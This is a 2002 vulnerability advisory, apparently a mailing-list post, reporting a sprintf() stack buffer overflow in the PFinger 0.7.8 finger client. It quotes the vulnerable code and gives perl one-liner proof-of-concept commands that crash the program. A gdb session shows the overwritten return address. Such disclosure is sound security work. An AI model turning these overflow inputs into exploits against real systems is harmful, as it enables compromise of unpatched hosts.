PFinger Buffer Overflow Vulnerability.
* Affected version: PFinger v0.7.8 (http://www.xelia.ch/unix/pfinger/)
* Overview:
Pfinger program has arrangement extent overflow bug.
This is that is found in client.
It did not confirm whether server side is weak.
Similar various kinds bug may exist anyway. :-(
* Description:
This happens as arrangement "query(size 100)" becomes overflow.
Of course, even if use (-l, -d, -t) option, cause same result.
Because this uses wrongly sprintf(), is happened. (line:144)
=== pfinger-0.7.8/src/finger.c =================================
:
:
int main( int argc, char *argv[] )
{
int flag;
char *progname;
int info = 0;
char *hostname;
char query[100];
:
:
sprintf(query, "%s%s\r\n", (info) ? "/W_" : "", argv[optind]);
~~~~~~~~
DoFinger1(hostname, query);
optind++;
}
:
:
================================================================
Next, Stack is stored as following.
query["xxxxxxxxxxxx...xxxxxx",'\r','\n','\0'];
* Proof of concept:
[x82_at_xpl017elz src]$ ./finger `perl -e 'print "x"x0x82'`
finger: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx: no such user.
Segmentation fault
[x82_at_xpl017elz src]$ ./finger -l `perl -e 'print "x"x0x82'`
finger: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx: no such user.
Segmentation fault
[x82_at_xpl017elz src]$ ./finger -d `perl -e 'print "x"x0x82'`
finger: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx: no such user.
Segmentation fault
[x82_at_xpl017elz src]$ ./finger -t `perl -e 'print "x"x0x82'`
finger: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx: no such user.
Segmentation fault
[x82_at_xpl017elz src]$ gcc -v
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/egcs-2.91.66/specs
gcc version egcs-2.91.66 19990314/Linux (egcs-1.1.2 release)
[x82_at_xpl017elz src]$
- Debugging -
[x82_at_xpl017elz src]$ gdb -q ./finger
(gdb) r -l `perl -e 'print "x"x100'`
Starting program: /usr/local/bin/pfinger-0.7.8/src/./finger -l `perl -e 'print "
x"x100'`
finger: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxx: no such user.
Program received signal SIGSEGV, Segmentation fault.
0x4005000a in _ufc_foobar () from /lib/libc.so.6
(gdb) r -l `perl -e 'print "x"x101'`
Program received signal SIGSEGV, Segmentation fault.
0x40000a0d in syslog_mem () from /lib/ld-linux.so.2
(gdb) r -l `perl -e 'print "x"x102'`
Program received signal SIGSEGV, Segmentation fault.
0xa0d78 in ?? ()
(gdb)
(gdb) r -l `perl -e 'print "x"x105'`
Starting program: /usr/local/bin/pfinger-0.7.8/src/./finger -l `perl -e 'print "
x"x105'`
finger: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx: no such user.
Program received signal SIGSEGV, Segmentation fault.
0x400a4b53 in strrchr () from /lib/libc.so.6
(gdb) where
#0 0x400a4b53 in strrchr () from /lib/libc.so.6
#1 0xbffff564 in ?? ()
#2 0x78787878 in ?? ()
Cannot access memory at address 0x78787878.
(gdb)
P.S: Sorry, my poor english.
__
By "dong-houn yoU" (Xpl017Elz), in INetCop(c).
E-mail: szoahc_at_hotmail.com
Home: http://x82.i21c.net
--
Powered by Outblaze
Received on Jun 04 2002
Intro
